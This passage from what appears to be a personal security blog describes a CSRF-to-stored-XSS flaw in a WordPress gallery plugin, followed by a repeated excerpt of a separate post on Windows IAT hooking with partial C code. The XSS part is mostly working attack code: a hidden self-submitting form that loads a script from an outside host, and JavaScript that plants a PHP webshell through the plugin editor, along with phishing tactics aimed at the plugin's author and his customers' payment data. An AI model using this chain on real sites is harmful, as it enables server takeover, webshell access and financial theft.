<em>wp-content/plugins/easy-media-gallery/includes/settings.php</em> on line
14, the following function (reformatted, because the original source
code is a pain to read) causes a lot of inconvenience:</p>
<div class="highlight"><pre><span></span><code><span class="x">function spg_add_admin() {</span>
<span class="x"> global $emgplugname, $theshort, $theopt;</span>
<span class="x"> if (is_admin() && ( isset($_GET['page']) == 'emg_settings' ) && ( isset($_GET['post_type']) == 'easymediagallery' )) {</span>
<span class="x"> if (isset($_REQUEST['action']) && 'save' == $_REQUEST['action']) {</span>
<span class="x"> $curtosv = get_option('easy_media_opt');</span>
<span class="x"> foreach ($theopt as $theval) {</span>
<span class="x"> $curtosv[$theval['id']] = $_REQUEST[$theval['id']];</span>
<span class="x"> update_option('easy_media_opt', $curtosv);</span>
<span class="x"> }</span>
<span class="x"> header("Location: edit.php?post_type=easymediagallery&page=emg_settings&saved=true");</span>
<span class="x"> die;</span>
<span class="x"> } else if (isset($_REQUEST['action']) && 'reset' == $_REQUEST['action']) {</span>
<span class="x"> // RESTORE DEFAULT SETTINGS</span>
<span class="x"> easymedia_restore_to_default($_REQUEST['action']);</span>
<span class="x">// END</span>
<span class="x"> header("Location: edit.php?post_type=easymediagallery&page=emg_settings&reset=true");</span>
<span class="x"> die;</span>
<span class="x"> }</span>
<span class="x"> }</span>
<span class="x"> add_submenu_page(</span>
<span class="x"> 'edit.php?post_type=easymediagallery', __('Easy Media Gallery Settings', 'easmedia'), __('Settings', 'easmedia'), 'manage_options', 'emg_settings', 'spg_admin'</span>
<span class="x"> );</span>
<span class="x">}</span>
<span class="x">// Lots of other code</span>
<span class="x">// .</span>
<span class="x">// .</span>
<span class="x">// .</span>
<span class="x">add_action('admin_menu', 'spg_add_admin');</span>
</code></pre></div>
<p>So what does the above code do (wrong)?</p>
<p>Well first of all, it's a callback function that get's triggered upon
visiting the admin menu, because the hook 'admin_menu' happens to fire
there. So this function is executed whenever a admin user visits the
administration panel. Inside the function, there are checks whether the
user is the admin (with is_admin()) and whether some query parameters
are set to predefined values. Then one layer further into the if
statements, the code verifies whether the parameter 'action' is set to
'save'. If so, the function continues to update the database <em>with
user-supplied options</em> for the plugin in a foreach loop. The other
if-branch is of no further interest here (although it can also
considered to be a CRSF), because it only allows attackers to reset
options.</p>
<p>So which options can we update? And why is it dangerous that we may
trick a admin user into updating the options with values set to our
liking?</p>
<p>To answer the first question, these are the keys to the plugin options
that we can update:</p>
<div class="highlight"><pre><span></span><code>easymedia_columns
easymedia_alignstyle
easymedia_img_size_limit
easymedia_vid_size
easymedia_disen_autoplv
easymedia_disen_autopl
easymedia_disen_audio_loop
easymedia_audio_vol
easymedia_box_style
easymedia_cur_style
easymedia_mag_icon
easymedia_frm_size
easymedia_frm_col
easymedia_ttl_col
easymedia_brdr_rds
easymedia_thumb_col
easymedia_hover_opcty
easymedia_style_pattern <-- This looks like a good injection point --|
easymedia_disen_bor
easymedia_disen_hovstyle
easymedia_disen_plug
easymedia_disen_rclick
easymedia_disen_databk
easymedia_disen_admnotify
easymedia_disen_dasnews
easymedia_disen_ajax
easymedia_ajax_con_id
easymedia_plugin_core
</code></pre></div>
<p>And now let's discuss the second question: It is common for developers
to output data originating from the database without sanitizing it. The
belief is probably something like <em>Why should I consider the data in my
own database to be dangerous?</em>. Because you have to decide at least at
some point when you sanitize your data. The best way to do so is just
before the critical action happens. Escape html attributes before you
print data to the screen. Prevent SQL injections right before crafting
the query. This strategy is called outbound input handling. You can read
more about it on
<a href="http://excess-xss.com/" title="Good article about XSS">excess-xss.com</a>.</p>
<p>But the authors of ghozy lab didn't apply neither inbound nor outbound
input handling which lead to potentially malicious code in the database
that is eventually printed to the administration screen by causing a
stored XSS (The output and admin menu generation code is also in
wp-content/plugins/easy-media-gallery/includes/emg-settings.php between
line 275 and 520.</p>
<p>Again in short and for conclusion: Because there is no way to guarantee
that the action originated from a intentional form submittal by the
administrator (Because there are no security checks with anti
Cross-Site-Request-Forgery barriers such as check_admin_referer() or
check_ajax_referer()), any attacker can set up a page that
incorporates the following form hidden into the site. Note that the form
submits itself in a stealth way, such that a visitor isnt' able to
observer anything suspicious.</p>
<div class="highlight"><pre><span></span><code><span class="cp"><!DOCTYPE html></span>
<span class="p"><</span><span class="nt">html</span><span class="p">></span>
<span class="p"><</span><span class="nt">head</span><span class="p">></span>
<span class="p"><</span><span class="nt">title</span><span class="p">></span>XSS POC<span class="p"></</span><span class="nt">title</span><span class="p">></span>
<span class="p"><</span><span class="nt">meta</span> <span class="na">charset</span><span class="o">=</span><span class="s">"UTF-8"</span><span class="p">></span>
<span class="p"><</span><span class="nt">meta</span> <span class="na">name</span><span class="o">=</span><span class="s">"viewport"</span> <span class="na">content</span><span class="o">=</span><span class="s">"width=device-width"</span><span class="p">></span>
<span class="p"></</span><span class="nt">head</span><span class="p">></span>
<span class="p"><</span><span class="nt">body</span><span class="p">></span>
<span class="p"><</span><span class="nt">div</span> <span class="na">style</span><span class="o">=</span><span class="s">"display:none;"</span><span class="p">></span>
<span class="p"><</span><span class="nt">iframe</span> <span class="na">id</span><span class="o">=</span><span class="s">"xss-test-iframe"</span> <span class="na">name</span><span class="o">=</span><span class="s">"xss-test-iframe"</span><span class="p">></</span><span class="nt">iframe</span><span class="p">></span>
<span class="p"><</span><span class="nt">form</span> <span class="na">id</span><span class="o">=</span><span class="s">"xss-test"</span> <span class="na">action</span><span class="o">=</span><span class="s">"http://localhost/~nikolai/wordpress_pentest/wordpress/wp-admin/index.php?page=settings&post_type=easymediagallery"</span> <span class="na">method</span><span class="o">=</span><span class="s">"POST"</span><span class="p">></span>
<span class="p"><</span><span class="nt">input</span> <span class="na">type</span><span class="o">=</span><span class="s">"hidden"</span> <span class="na">name</span><span class="o">=</span><span class="s">"action"</span> <span class="na">value</span><span class="o">=</span><span class="s">"save"</span> <span class="p">/></span>
<span class="p"><</span><span class="nt">input</span> <span class="na">type</span><span class="o">=</span><span class="s">"hidden"</span> <span class="na">name</span><span class="o">=</span><span class="s">"easymedia_style_pattern"</span> <span class="na">value</span><span class="o">=</span><span class="s">'pattern-01.png" name="easymedia_style_pattern" id="easymedia_style_pattern" /><script src=http://somehackedserver.com/plugin-loader.js>//Nothin here</script>'</span> <span class="p">/></span>
<span class="p"></</span><span class="nt">form</span><span class="p">></span>
<span class="p"><</span><span class="nt">script</span> <span class="na">type</span><span class="o">=</span><span class="s">"text/javascript"</span><span class="p">></span>
<span class="nb">document</span><span class="p">.</span><span class="nx">getElementById</span><span class="p">(</span><span class="s1">'xss-test'</span><span class="p">).</span><span class="nx">submit</span><span class="p">();</span>
<span class="p"></</span><span class="nt">script</span><span class="p">></span>
<span class="p"></</span><span class="nt">div</span><span class="p">></span>
<span class="p"></</span><span class="nt">body</span><span class="p">></span>
<span class="p"></</span><span class="nt">html</span><span class="p">></span>
</code></pre></div>
<p>Of course the appropriate values have to be set to match the victims
server credentials. So if we wanted to target the plugin developer, we
would just use the URL in the POST form</p>
<div class="highlight"><pre><span></span><code>http://ghozylab.com/wp-admin/index.php?page=settings&post_type=easymediagallery
</code></pre></div>
<p>and we would host the javascript payload on a hacked server. But wait,
the above POC has the payload</p>
<div class="highlight"><pre><span></span><code>pattern-01.png" name="easymedia_style_pattern" id="easymedia_style_pattern" /><span class="nt"><script</span> <span class="na">src=</span><span class="s">http://somehackedserver.com/plugin-loader.js</span><span class="nt">></span>//Nothin here<span class="nt"></script></span>
</code></pre></div>
<p>Now that we can execute arbitrary javascript code in the context of the
admin, what can we possibly do? Well, we can gain remote code execution.
That's the worst outcome of any possible web hack attack, because it
allows us to gain a foothold on the server. Possible scenarios from
there: Steal the databases (money), try to gain root privileges on the
server in order to completely own it. But this is usually kinda hard.</p>
<p>Anyways, the javascript that is loaded by the stored XSS modifies the
standard plugin hello.php (hello dolly plugin, it's installed by
default) and adds a PHP webshell to it.</p>
<p>You want to see the code how I managed to to implement it?</p>
<p>It's rather straightforward and there are probably more elegant ways,
such as using jQuery. Keep in mind that the URL is set to my local
pentest server, except ALERT_URL, this is just made up. In the real
world, you'd substitute the urls to a hacked server that you own and
from which you start and execute your attacks.</p>
<div class="highlight"><pre><span></span><code> <span class="cm">/* </span>
<span class="cm"> * Copyright: Nikolai Tschacher.</span>
<span class="cm"> * Site: incolumitas.com</span>
<span class="cm"> * Easy as pie.</span>
<span class="cm"> * What: Use this code when you found a stored XSS in a wordpress plugin to gain RCE.</span>
<span class="cm"> * How: A wordpress admin needs to run this code in his browser with a valid session id.</span>
<span class="cm"> * Idea: Mofify the flash-album-gallery plugin via wordpress admin panel.</span>
<span class="cm"> * </span>
<span class="cm"> * Note: This is actually nothing new. It's just one of many ways to gain RCE</span>
<span class="cm"> * if you have a stored XSS in a wordpress session.</span>
<span class="cm"> */</span>
<span class="c1">// Without php tags</span>
<span class="c1">// HTML meta chars are in character entity references format.</span>
<span class="kd">var</span> <span class="nx">EXPLOIT_CODE</span> <span class="o">=</span> <span class="s2">"\nif (isset($_GET[&#039;cmd&#039;])&amp;&amp; !empty($_GET[&#039;cmd&#039;])){ echo &#039;<pre>&#039;;system($_GET[&#039;cmd&#039;]);echo &#039;</pre>&#039;; }"</span><span class="p">;</span>
<span class="c1">// TARGET SETTINGS. Set stuff here.</span>
<span class="kd">var</span> <span class="nx">TARGET_WP_PATH</span> <span class="o">=</span> <span class="s2">"http://localhost/wordpress"</span><span class="p">;</span>
<span class="kd">var</span> <span class="nx">PLUGIN_EDITOR_URL</span> <span class="o">=</span> <span class="nx">TARGET_WP_PATH</span> <span class="o">+</span> <span class="s2">"/wp-admin/plugin-editor.php"</span><span class="p">;</span>
<span class="kd">var</span> <span class="nx">PLUGIN_EDIT_URL</span> <span class="o">=</span> <span class="nx">PLUGIN_EDITOR_URL</span> <span class="o">+</span> <span class="s2">"?file=flash-album-gallery/flag.php"</span><span class="p">;</span>
<span class="kd">function</span> <span class="nx">getXMLHttpRequestObject</span><span class="p">()</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">ref</span> <span class="o">=</span> <span class="kc">null</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="nb">window</span><span class="p">.</span><span class="nx">XMLHttpRequest</span><span class="p">)</span> <span class="p">{</span> <span class="c1">// For recent browsers.</span>
<span class="nx">ref</span> <span class="o">=</span> <span class="ow">new</span> <span class="nx">XMLHttpRequest</span><span class="p">();</span>
<span class="p">}</span> <span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="nb">window</span><span class="p">.</span><span class="nx">ActiveXObject</span><span class="p">)</span> <span class="p">{</span> <span class="c1">// Older IE 6,7,8</span>
<span class="nx">ref</span> <span class="o">=</span> <span class="ow">new</span> <span class="nx">ActiveXObject</span><span class="p">(</span><span class="s2">"MSXML2.XMLHTTP.3.0"</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">return</span> <span class="nx">ref</span><span class="p">;</span>
<span class="p">}</span>
<span class="cm">/* Extract the nonce */</span>
<span class="kd">function</span> <span class="nx">exploit</span><span class="p">()</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">req</span> <span class="o">=</span> <span class="kc">null</span><span class="p">;</span>
<span class="nx">req</span> <span class="o">=</span> <span class="nx">getXMLHttpRequestObject</span><span class="p">();</span>
<span class="nx">req</span><span class="p">.</span><span class="nx">onreadystatechange</span> <span class="o">=</span> <span class="kd">function</span><span class="p">()</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">req</span><span class="p">.</span><span class="nx">readyState</span> <span class="o">==</span> <span class="mf">4</span> <span class="o">&&</span> <span class="nx">req</span><span class="p">.</span><span class="nx">status</span> <span class="o">==</span> <span class="mf">200</span><span class="p">)</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">res</span> <span class="o">=</span> <span class="sr">/name="_wpnonce"\svalue=\"[a-z0-9]{10}\"/</span><span class="p">.</span><span class="nx">exec</span><span class="p">(</span><span class="nx">req</span><span class="p">.</span><span class="nx">responseText</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">res</span><span class="p">.</span><span class="nx">length</span> <span class="o">==</span> <span class="mf">1</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">nonce</span> <span class="o">=</span> <span class="sr">/[a-z0-9]{10}/</span><span class="p">.</span><span class="nx">exec</span><span class="p">(</span><span class="nx">res</span><span class="p">[</span><span class="mf">0</span><span class="p">]);</span>
<span class="p">}</span> <span class="k">else</span> <span class="p">{</span> <span class="c1">// The sites not available. Maybe the plugin is not installed?!</span>
<span class="nx">nonce</span> <span class="o">=</span> <span class="kc">null</span><span class="p">;</span>
<span class="p">}</span>
<span class="nx">modify_plugin</span><span class="p">(</span><span class="nx">req</span><span class="p">.</span><span class="nx">responseText</span><span class="p">,</span> <span class="nx">nonce</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="nx">req</span><span class="p">.</span><span class="nx">open</span><span class="p">(</span><span class="s2">"GET"</span><span class="p">,</span> <span class="nx">PLUGIN_EDIT_URL</span><span class="p">,</span> <span class="kc">true</span><span class="p">);</span>
<span class="nx">req</span><span class="p">.</span><span class="nx">send</span><span class="p">();</span>
<span class="p">}</span>
<span class="cm">/* Modify the plugin with malicous code with plugin editor */</span>
<span class="kd">function</span> <span class="nx">modify_plugin</span><span class="p">(</span><span class="nx">responseText</span><span class="p">,</span> <span class="nx">nonce</span><span class="p">)</span> <span class="p">{</span>
<span class="c1">// Get the plugin code</span>
<span class="c1">// On each wordpress plugin edit site, there's just one textarea tag.</span>
<span class="c1">// The plugin code itself lies between the textarea tags.</span>
<span class="c1">// These regexes aren't really good.</span>
<span class="kd">var</span> <span class="nx">startIndex</span> <span class="o">=</span> <span class="nx">responseText</span><span class="p">.</span><span class="nx">match</span><span class="p">(</span><span class="sr">/<textarea.*?name="newcontent".*?>/</span><span class="p">);</span>
<span class="kd">var</span> <span class="nx">stopIndex</span> <span class="o">=</span> <span class="nx">responseText</span><span class="p">.</span><span class="nx">match</span><span class="p">(</span><span class="sr">/<\/textarea>/</span><span class="p">);</span>
<span class="nx">pluginCode</span> <span class="o">=</span> <span class="nx">responseText</span><span class="p">.</span><span class="nx">substring</span><span class="p">(</span><span class="nx">startIndex</span><span class="p">.</span><span class="nx">index</span><span class="o">+</span><span class="nx">startIndex</span><span class="p">[</span><span class="mf">0</span><span class="p">].</span><span class="nx">length</span><span class="p">,</span> <span class="nx">stopIndex</span><span class="p">.</span><span class="nx">index</span><span class="p">);</span>
<span class="c1">// add our exploit code at the beginning of the plugin after the "// Stop direct call" comment.</span>
<span class="k">if</span> <span class="p">(</span><span class="sr">/((\/){2}\sStop\sdirect\scall)/</span><span class="p">.</span><span class="nx">test</span><span class="p">(</span><span class="nx">pluginCode</span><span class="p">))</span> <span class="p">{</span>
<span class="nx">pluginCode</span> <span class="o">=</span> <span class="nx">pluginCode</span><span class="p">.</span><span class="nx">replace</span><span class="p">(</span><span class="sr">/((\/){2}\sStop\sdirect\scall)/</span><span class="p">,</span> <span class="s2">"$1"</span> <span class="o">+</span> <span class="nx">EXPLOIT_CODE</span><span class="p">);</span>
<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
<span class="c1">// Let's go for the first line after the obligatory wp plugin comment and lets use the closing comment</span>
<span class="c1">// characters */ as needle as a fallback.</span>
<span class="nx">pluginCode</span> <span class="o">=</span> <span class="nx">pluginCode</span><span class="p">.</span><span class="nx">replace</span><span class="p">(</span><span class="sr">/^(\*\/)/m</span><span class="p">,</span> <span class="s2">"$1"</span> <span class="o">+</span> <span class="s2">"\n"</span> <span class="o">+</span> <span class="nx">EXPLOIT_CODE</span><span class="p">);</span>
<span class="p">}</span>
<span class="c1">// We need to consider that the plugin code in this state is making use of Character entity references</span>
<span class="c1">// for all html meta characters like " ' < > & \ to avoid them of being interepreted as markup.</span>
<span class="c1">// We need to replace them with their "real" characters, before we send the plugin as post data.</span>
<span class="nx">pluginCode</span> <span class="o">=</span> <span class="nx">removeCharEntityReferences</span><span class="p">(</span><span class="nx">pluginCode</span><span class="p">);</span>
<span class="c1">// Ready to build our POST request</span>
<span class="nx">preq</span> <span class="o">=</span> <span class="nx">getXMLHttpRequestObject</span><span class="p">();</span>
<span class="nx">preq</span><span class="p">.</span><span class="nx">onload</span> <span class="o">=</span> <span class="kd">function</span> <span class="p">()</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">preq</span><span class="p">.</span><span class="nx">readyState</span> <span class="o">==</span> <span class="mf">4</span> <span class="o">&&</span> <span class="nx">preq</span><span class="p">.</span><span class="nx">status</span> <span class="o">==</span> <span class="mf">200</span><span class="p">)</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">successPattern</span> <span class="o">=</span> <span class="sr">/File\sedited\ssuccessfully./</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">successPattern</span><span class="p">.</span><span class="nx">test</span><span class="p">(</span><span class="nx">preq</span><span class="p">.</span><span class="nx">responseText</span><span class="p">))</span>
<span class="nx">alert</span><span class="p">(</span><span class="s2">"Done."</span><span class="p">);</span>
<span class="c1">// Notify the attacker that the exploit has been spawned.</span>
<span class="k">else</span>
<span class="nx">alert</span><span class="p">(</span><span class="s2">"Nope."</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">};</span>
<span class="nx">preq</span><span class="p">.</span><span class="nx">open</span><span class="p">(</span><span class="s2">"POST"</span><span class="p">,</span> <span class="nx">PLUGIN_EDITOR_URL</span><span class="p">,</span> <span class="kc">true</span><span class="p">);</span>
<span class="nx">preq</span><span class="p">.</span><span class="nx">setRequestHeader</span><span class="p">(</span><span class="s2">"Content-Type"</span><span class="p">,</span> <span class="s2">"application/x-www-form-urlencoded"</span><span class="p">);</span>
<span class="nx">pd</span> <span class="o">=</span> <span class="p">{</span>
<span class="nx">_wpnonce</span><span class="o">:</span> <span class="nx">nonce</span><span class="p">,</span>
<span class="nx">_wp_http_referer</span><span class="o">:</span> <span class="nx">PLUGIN_EDIT_URL</span> <span class="o">+</span> <span class="s2">"&a=te&scrollto=0"</span><span class="p">,</span>
<span class="nx">a</span><span class="o">:</span> <span class="s2">""</span><span class="p">,</span>
<span class="nx">scrollto</span><span class="o">:</span> <span class="s2">"192"</span><span class="p">,</span>
<span class="nx">newcontent</span><span class="o">:</span> <span class="nb">encodeURIComponent</span><span class="p">(</span><span class="nx">pluginCode</span><span class="p">),</span>
<span class="nx">action</span><span class="o">:</span> <span class="s2">"update"</span><span class="p">,</span>
<span class="nx">file</span><span class="o">:</span> <span class="s2">"flash-album-gallery/flag.php"</span><span class="p">,</span>
<span class="nx">plugin</span><span class="o">:</span> <span class="s2">"flash-album-gallery/flag.php"</span><span class="p">,</span>
<span class="nx">submit</span><span class="o">:</span> <span class="s2">"Update+File"</span>
<span class="p">};</span>
<span class="c1">// Build the post data.</span>
<span class="nx">postdata</span> <span class="o">=</span> <span class="s2">""</span><span class="p">;</span>
<span class="k">for</span> <span class="p">(</span><span class="kd">var</span> <span class="nx">key</span> <span class="ow">in</span> <span class="nx">pd</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">postdata</span> <span class="o">+=</span> <span class="p">(</span><span class="nx">key</span> <span class="o">+</span> <span class="s2">"="</span> <span class="o">+</span> <span class="nx">pd</span><span class="p">[</span><span class="nx">key</span><span class="p">]</span> <span class="o">+</span> <span class="s2">"&"</span><span class="p">);</span>
<span class="p">}</span>
<span class="nx">postdata</span> <span class="o">=</span> <span class="nx">postdata</span><span class="p">.</span><span class="nx">substr</span><span class="p">(</span><span class="mf">0</span><span class="p">,</span> <span class="nx">postdata</span><span class="p">.</span><span class="nx">length</span><span class="o">-</span><span class="mf">1</span><span class="p">);</span> <span class="c1">// rstrip the last &</span>
<span class="nx">preq</span><span class="p">.</span><span class="nx">send</span><span class="p">(</span><span class="nx">postdata</span><span class="p">);</span>
<span class="p">}</span>
<span class="cm">/*</span>
<span class="cm"> * Removes the HTML char entity references for the HTML meta characters.</span>
<span class="cm"> */</span>
<span class="kd">function</span> <span class="nx">removeCharEntityReferences</span><span class="p">(</span><span class="nx">data</span><span class="p">)</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">((</span><span class="ow">typeof</span> <span class="nx">data</span><span class="p">)</span> <span class="o">!==</span> <span class="s2">"string"</span><span class="p">)</span> <span class="p">{</span>
<span class="k">throw</span> <span class="ow">new</span> <span class="ne">TypeError</span><span class="p">(</span><span class="s2">"data needs to be a string"</span><span class="p">);</span>
<span class="k">return</span> <span class="kc">null</span><span class="p">;</span>
<span class="p">}</span>
<span class="nx">data</span> <span class="o">=</span> <span class="nx">data</span><span class="p">.</span><span class="nx">replace</span><span class="p">(</span><span class="sr">/&quot;/g</span><span class="p">,</span> <span class="s2">"\""</span><span class="p">);</span>
<span class="nx">data</span> <span class="o">=</span> <span class="nx">data</span><span class="p">.</span><span class="nx">replace</span><span class="p">(</span><span class="sr">/&#039;/g</span><span class="p">,</span> <span class="s2">"'"</span><span class="p">);</span>
<span class="nx">data</span> <span class="o">=</span> <span class="nx">data</span><span class="p">.</span><span class="nx">replace</span><span class="p">(</span><span class="sr">/&lt;/g</span><span class="p">,</span> <span class="s2">"<"</span><span class="p">);</span>
<span class="nx">data</span> <span class="o">=</span> <span class="nx">data</span><span class="p">.</span><span class="nx">replace</span><span class="p">(</span><span class="sr">/&gt;/g</span><span class="p">,</span> <span class="s2">">"</span><span class="p">);</span>
<span class="nx">data</span> <span class="o">=</span> <span class="nx">data</span><span class="p">.</span><span class="nx">replace</span><span class="p">(</span><span class="sr">/&amp;/g</span><span class="p">,</span> <span class="s2">"&"</span><span class="p">);</span>
<span class="k">return</span> <span class="nx">data</span><span class="p">;</span>
<span class="p">}</span>
<span class="nx">exploit</span><span class="p">();</span>
</code></pre></div>
<h3>How dangrous is the vulnerability?</h3>
<p>I'd say such security holes are <strong>very dangerous</strong>.</p>
<p>Of course you need a minimal social engineering effort in order to make
the victim visit your attacking site that incorporates the auto
submittable form which in turn triggers the XSS. Additionaly, you need
to ensure that the victim possesses valid admin cookies of his wordpress
site. But there are ways to increase the likelihood that he has a valid
admin session when you attack him (Or better: When he visits the
attacking site).</p>
<p>For example here are some ways to deliver the attack:</p>
<ul>
<li>Post a comment on the target site. Then place a URL of your
attacking site within the comment. The victim admin will only see
the comment when he is logged in to approve or deny the publishing
of your comment. Hence he <em>must</em> have a valid admin session. So when
he clicks on the link: Boom, the server is completely fucked up!</li>
<li>Attack the author of the plugin. It is very likely that they have
the most recent version (And thus the vulnerability) installed on
the server. Write a email and feign a little issue with the
<em>elsewhere very cool and nice plugin</em>. Explain that your purchased
the PRO version of the plugin and that you experience issues with
some functionaliy in the administration form (This forces the plugin
author to falsify whether he has the same issues on his site, which
tricks him into loggin in and obtaining the necessary admin cookie).
Then add a detailed and plausible error explanation on your
attacking site, where the trigger is hidden (See POC above). The
victim visits and boom you own the server and all the financial
credits of all purchases made by the customers (which are most
likely on the same site as the plugin publishers). If you own the
plugin authors website and you managed to exploit it in a stealthy
way, you can continue spread male-ware from there.</li>
</ul>
<p>The only drawback I currently experienced in my tests, is that the
attacking form will make the victim visit his own admin menu. There is
no way to load the page hidden and execute the javascript without
changing the current screen of the browser to the admin form of the
victim, because in most cases wordpress (or sometimes the webserver)
sends automatically the header</p>
<div class="highlight"><pre><span></span><code>X-Frame-Options SAMEORIGIN;
</code></pre></div>
<p>which <a href="https://developer.mozilla.org/en-US/docs/HTTP/X-Frame-Options" title="x-frame-header prevents stealth xss">cripples all attempts to load the dom in a hidden
iframe</a>.
Thus, I cannot see a proper way to attack a victim without making him to
notice that something <em>odd</em> is going on. The plugin author would begin
to ask himself: Why the hell get I redirected to my own administration
menu of my blog when I just clicked on the link given by this clueless
customer that so desperately needs help with his little issue? Is there
something fishy? Am I being tricked?</p>
<p>But usually, then it's to late and I already have shell access to the
server.</p>
<p>So there needs to be done further research. In particular: do you have a
idea to execute the attack more stealthy, such that the POST request
that causes the XSS doesn't inevitably send the victim to the sink
source of the tainted data?</p>
<p>Please send me a comment if you have a idea!</p>
<p>Cheers</p>IAT hooking2013-12-07T11:37:00+01:002013-12-07T11:37:00+01:00Nikolai Tschachertag:incolumitas.com,2013-12-07:/2013/12/07/iat-hooking/<h3>What</h3>
<p>I just rummaged through my old hard disk and suddenly stumbled across
some old C sources from around a year ago when I played with IAT hooking
on windows 7. I will not explain much, but I made the bottom code around
a year ago (Thus, in 2012) and it should be able to hook any code
(depicted as the handler here) into running processes via the IAT. I
suppose the code is not working properly, but it gives a good picture of
how an IAT hooking approach might look like.</p>
<h3><a href="http://www.youtube.com/watch?v=432PZ9787n0">What'll you do?</a></h3>
<p>Hopefully I'll find some time and motivation (or more appropriate:
discipline) to update the little library and finally complete it. Maybe
I will also make it compatible with windows 8, but I assume it's not
really different from windows 7 (Hell I don't know anything about the
windows API)...</p>
<div class="highlight"><pre><span></span><code><span class="cp">#include</span><span class="w"> </span><span class="cpf">"main.h"</span><span class="cp"></span>
<span class="cm">/* </span>
<span class="cm"> * Implements a little library to Hook the WinApi on running programs.</span>
<span class="cm"> * Furthermore, the API provides functions too find code caves and little hook templates for the most common scenarios</span>
<span class="cm"> * when we use hooking: Intercept function parameters and monitor output...</span>
<span class="cm"> * Supports both, 32 and 64 bit Windows XP to Windows 7. The code is …</span></code></pre></div><h3>What</h3>
<p>I just rummaged through my old hard disk and suddenly stumbled across
some old C sources from around a year ago when I played with IAT hooking
on windows 7. I will not explain much, but I made the bottom code around
a year ago (Thus, in 2012) and it should be able to hook any code
(depicted as the handler here) into running processes via the IAT. I
suppose the code is not working properly, but it gives a good picture of
how an IAT hooking approach might look like.</p>
<h3><a href="http://www.youtube.com/watch?v=432PZ9787n0">What'll you do?</a></h3>
<p>Hopefully I'll find some time and motivation (or more appropriate:
discipline) to update the little library and finally complete it. Maybe
I will also make it compatible with windows 8, but I assume it's not
really different from windows 7 (Hell I don't know anything about the
windows API)...</p>
<div class="highlight"><pre><span></span><code><span class="cp">#include</span><span class="w"> </span><span class="cpf">"main.h"</span><span class="cp"></span>
<span class="cm">/* </span>
<span class="cm"> * Implements a little library to Hook the WinApi on running programs.</span>
<span class="cm"> * Furthermore, the API provides functions too find code caves and little hook templates for the most common scenarios</span>
<span class="cm"> * when we use hooking: Intercept function parameters and monitor output...</span>
<span class="cm"> * Supports both, 32 and 64 bit Windows XP to Windows 7. The code is pretty bloated, because</span>
<span class="cm"> * I intended to catch as many errors as possbible and included some debug stuff. This hooking 'library' shall be reliable.</span>
<span class="cm"> * It provides just IAT hooking, no other code injections.</span>
<span class="cm"> */</span><span class="w"></span>
<span class="kt">int</span><span class="w"></span>
<span class="nf">main</span><span class="p">(</span><span class="kt">int</span><span class="w"> </span><span class="n">argc</span><span class="p">,</span><span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="n">argv</span><span class="p">[])</span><span class="w"></span>
<span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">HANDLE</span><span class="w"> </span><span class="n">hProcess</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">HOOK_CONTEXT</span><span class="w"> </span><span class="o">*</span><span class="n">pHookContext</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">DWORD</span><span class="w"> </span><span class="n">pid</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">BOOL</span><span class="w"> </span><span class="n">bSuccess</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="kt">char</span><span class="o">*</span><span class="w"> </span><span class="n">handler</span><span class="w"> </span><span class="o">=</span><span class="w"></span>
<span class="w"> </span><span class="s">"</span><span class="se">\x90\x90\x90\x90\x90\x90\x90\x90</span><span class="s">"</span><span class="w"></span>
<span class="w"> </span><span class="s">"</span><span class="se">\x90\x90\x90\x90\x90\x90\x90\x90</span><span class="s">"</span><span class="w"></span>
<span class="w"> </span><span class="s">"</span><span class="se">\x90\x90\x90\x90\x90\x90\x90\x90</span><span class="s">"</span><span class="p">;</span><span class="w"></span>
<span class="cp">#ifdef _WIN64</span>
<span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"[i] 64 architecture detected</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="w"> </span><span class="s">"[-] Sorry, currently not supported</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">exit</span><span class="p">(</span><span class="n">EXIT_FAILURE</span><span class="p">);</span><span class="w"></span>
<span class="cp">#endif</span>
<span class="cp">#ifdef _WIN32</span>
<span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"[i] 32 architecture detected</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span><span class="w"></span>
<span class="cp">#endif</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">argc</span><span class="w"> </span><span class="o"><</span><span class="w"> </span><span class="mi">2</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">pid</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">GetCurrentProcessId</span><span class="p">();</span><span class="w"></span>
<span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"[i] using current process id as target</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">argc</span><span class="w"> </span><span class="o">>=</span><span class="w"> </span><span class="mi">2</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
